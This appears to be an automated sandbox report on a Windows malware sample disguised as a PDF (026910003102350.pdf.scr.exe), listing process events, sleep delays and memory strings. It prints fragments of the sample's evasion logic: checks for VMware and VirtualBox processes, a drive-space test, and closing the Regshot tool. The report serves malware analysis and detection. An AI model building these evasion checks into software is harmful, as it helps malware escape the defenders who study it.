      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      Source: Yara matchFile source: 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR
      Source: itugx.exe, 00000017.00000003.533363458.0000000000D07000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.529712010.0000000000CB8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.534973802.0000000000D26000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.536173123.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000002.542096662.0000000000D2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXESW
      Source: itugx.exe, 00000015.00000003.505153695.00000000012E8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000002.512758146.000000000135A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.506047618.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.508004868.000000000135A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.506688814.000000000135A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.506384568.0000000001356000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXEQ
      Source: itugx.exe, 00000005.00000003.410793804.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.452549594.00000000014CB000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.411039467.00000000014B6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.450945660.00000000014C4000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.452340975.00000000014C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("REGSHOT.EXE")#
      Source: itugx.exe, 00000017.00000003.533363458.0000000000D07000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.529712010.0000000000CB8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.534973802.0000000000D26000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.536173123.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000002.542096662.0000000000D2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXED
      Source: itugx.exe, 00000002.00000003.386800246.0000000000E02000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.410540336.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.400635217.0000000000E08000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.440840027.00000000013B6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.439624886.00000000013A6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.468989814.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.461712871.00000000013C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("REGSHOT.EXE")
      Source: itugx.exe, 0000001C.00000003.541378375.00000000012E5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 0000001C.00000003.541599351.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("REGSHOT.EXE")<
      Source: itugx.exe, 00000010.00000002.470477695.00000000013CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("REGSHOT.EXE")44V$
      Source: itugx.exe, 0000001C.00000003.541378375.00000000012E5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 0000001C.00000003.541599351.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN?8CJ
      Source: itugx.exe, 00000019.00000003.565987603.000000000195C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000019.00000003.565769789.000000000195C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000019.00000003.563164824.0000000001959000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000019.00000002.569636959.000000000195C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000019.00000003.567142794.000000000195C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXE=
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.0000000007390000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp, wscript.exe, 0000001B.00000002.537175124.0000025B9CBDF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001B.00000003.533357927.0000025B9CBBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001B.00000003.533720665.0000025B9CBDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ORIGINALFILENAMEAUTORUNS.EXEL,
      Source: wscript.exe, 0000001B.00000002.536000753.0000025B9CBBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001B.00000003.533357927.0000025B9CBBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: LFILENAMEAUTORUNS.EXEL,
      Source: itugx.exe, 0000001C.00000002.577313681.0000000001338000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXEL~
      Source: itugx.exe, 00000002.00000003.397098361.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.389382633.0000000000E36000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.369716492.0000000000E36000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000002.412647234.0000000000E3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THENXJ\
      Source: itugx.exe, 00000005.00000003.452396525.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.410793804.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.411039467.00000000014B6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000002.455207897.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.450945660.00000000014C4000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451302859.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451585020.00000000014D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN-
      Source: itugx.exe, 00000010.00000002.470505280.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.440840027.00000000013B6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.439624886.00000000013A6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.469351165.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.465307309.00000000013D1000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.467780564.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.461712871.00000000013C4000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.465193535.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.467653750.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.507346397.00000000012C0000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.509588017.00000000012C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
      Source: itugx.exe, 00000002.00000003.400023583.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.399006405.0000000000E96000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000002.412932307.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.396010910.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.400917680.0000000000EA7000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451422910.0000000001568000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000002.455510913.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451597738.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.467505109.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000002.470674080.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.466572234.0000000001469000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXES
      Source: itugx.exe, 00000002.00000003.400023583.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.399006405.0000000000E96000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000002.412932307.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.396010910.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.400917680.0000000000EA7000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451422910.0000000001568000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000002.455510913.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451597738.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.467505109.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000002.470674080.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.466572234.0000000001469000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXE
      Source: itugx.exe, 00000015.00000003.467653750.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.467286288.0000000001295000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.505153695.00000000012B4000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.509289794.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.509361220.00000000012BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("REGSHOT.EXE")L
      Source: itugx.exe, 0000001C.00000002.577313681.0000000001338000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXESUY;`D
      Source: itugx.exe, 00000015.00000003.505153695.00000000012E8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000002.512758146.000000000135A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.506047618.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.508004868.000000000135A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.506688814.000000000135A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.506384568.0000000001356000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXES.
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5904Thread sleep count: 64 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5904Thread sleep count: 61 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 748Thread sleep count: 52 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 748Thread sleep count: 89 > 30
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 1916Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 4028Thread sleep count: 33 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 4028Thread sleep count: 56 > 30
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 4136Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5916Thread sleep count: 54 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5916Thread sleep count: 96 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5460Thread sleep count: 60 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5460Thread sleep count: 83 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5596Thread sleep count: 45 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5596Thread sleep count: 82 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 1920Thread sleep count: 64 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 1920Thread sleep count: 55 > 30
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeLast function: Thread delayed
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeWindow / User API: threadDelayed 9667
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeWindow / User API: foregroundWindowGot 455
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeAPI coverage: 5.3 %
      Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeAPI call chain: ExitProcess graph end node
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
      Source: itugx.exe, 00000005.00000003.411039467.00000000014B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VMwaretray.exe") Then#
      Source: itugx.exe, 00000015.00000003.505411546.00000000012AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VboxService.exe") Then
      Source: itugx.exe, 00000005.00000003.411039467.00000000014B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then=
      Source: itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VboxService.exe") Thena46
      Source: itugx.exe, 00000005.00000003.452233476.00000000014AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exe
      Source: itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exe\Microso
      Source: itugx.exe, 00000005.00000003.452233476.00000000014AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareService.exe65687
      Source: wscript.exe, 00000001.00000002.363558819.0000000002F60000.00000004.00000020.00040000.00000000.sdmpBinary or memory string: en-USenVMware.VMware.vmuiData\Local\Temp\Folder8_410\itugx.exe89
      Source: wscript.exe, 0000000D.00000002.421779421.000001EDEF160000.00000004.00000020.00040000.00000000.sdmpBinary or memory string: tBC:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe\??\C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exeen-USenVMware.VMware.vmui-----------------------------------------
      Source: rnnsh.xls.0.drBinary or memory string: If ProcessExists("VMwaretray.exe") Then
      Source: itugx.exe, 00000015.00000003.509119527.0000000001299000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareService.exeipt.S
      Source: itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VMwaretray.exe") Then
      Source: itugx.exe, 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: name="VMware.VMware.vmui"
      Source: itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Thenj0
      Source: itugx.exe, 00000010.00000003.468344244.0000000001412000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwaretray.exe^`DE$
      Source: itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Thenk5q
      Source: wscript.exe, 00000016.00000002.491522356.0000021FFC240000.00000004.00000020.00040000.00000000.sdmpBinary or memory string: C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe\??\C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exeen-USenVMware.VMware.vmui-----------------------------------------
      Source: itugx.exe, 00000017.00000003.539485403.0000000000CD1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwaretray.exe
      Source: itugx.exe, 00000015.00000003.467286288.0000000001295000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
      Source: itugx.exe, 00000015.00000003.505411546.00000000012AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then"
      Source: rnnsh.xls.0.drBinary or memory string: If ProcessExists("VboxService.exe") Then
      Source: wscript.exe, 00000001.00000003.361367465.00000000036F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware.VMware.vmuiData\Local\Temp\Folder8_410\itugx.exew
      Source: itugx.exe, 00000015.00000003.509119527.0000000001299000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exe6BA444D6.
      Source: itugx.exe, 00000010.00000003.469045500.00000000013AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exe3A765687
      Source: itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareService.exe536C7
      Source: itugx.exe, 00000002.00000003.409778317.0000000000E4D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwaretray.exeS
      Source: itugx.exe, 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: <description>"VMware Workstation"</description>
      Source: itugx.exe, 00000002.00000003.397098361.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.389382633.0000000000E36000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.409778317.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451315387.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.452100532.0000000001510000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451193951.00000000014F8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451994345.000000000150D000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.462893753.00000000013F8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.461712871.00000000013F8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.468154413.000000000140E000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.465422358.00000000013FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VBoxTray.exe
      Source: itugx.exe, 00000015.00000003.505411546.00000000012AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
      Source: itugx.exe, 00000005.00000003.451994345.000000000150D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwaretray.exen*
      Source: wscript.exe, 0000001B.00000002.534995230.0000025B9C8D0000.00000004.00000020.00040000.00000000.sdmpBinary or memory string: C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe\??\C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exeen-USenVMware.VMware.vmui-----------------------------------------[
      Source: itugx.exe, 0000001C.00000002.577313681.0000000001338000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VboxService.exe
      Source: itugx.exe, 00000005.00000003.410793804.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451151702.00000000014BE000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.411039467.00000000014B6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.462582507.00000000013BF000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.440840027.00000000013B6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.439624886.00000000013A6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.467653750.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.467286288.0000000001295000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.505411546.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 0000001C.00000003.541378375.00000000012E5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 0000001C.00000003.541599351.00000000012F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VBoxTray.exe") Then
      Source: itugx.exe, 0000001C.00000002.577313681.0000000001338000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwaretray.exe#
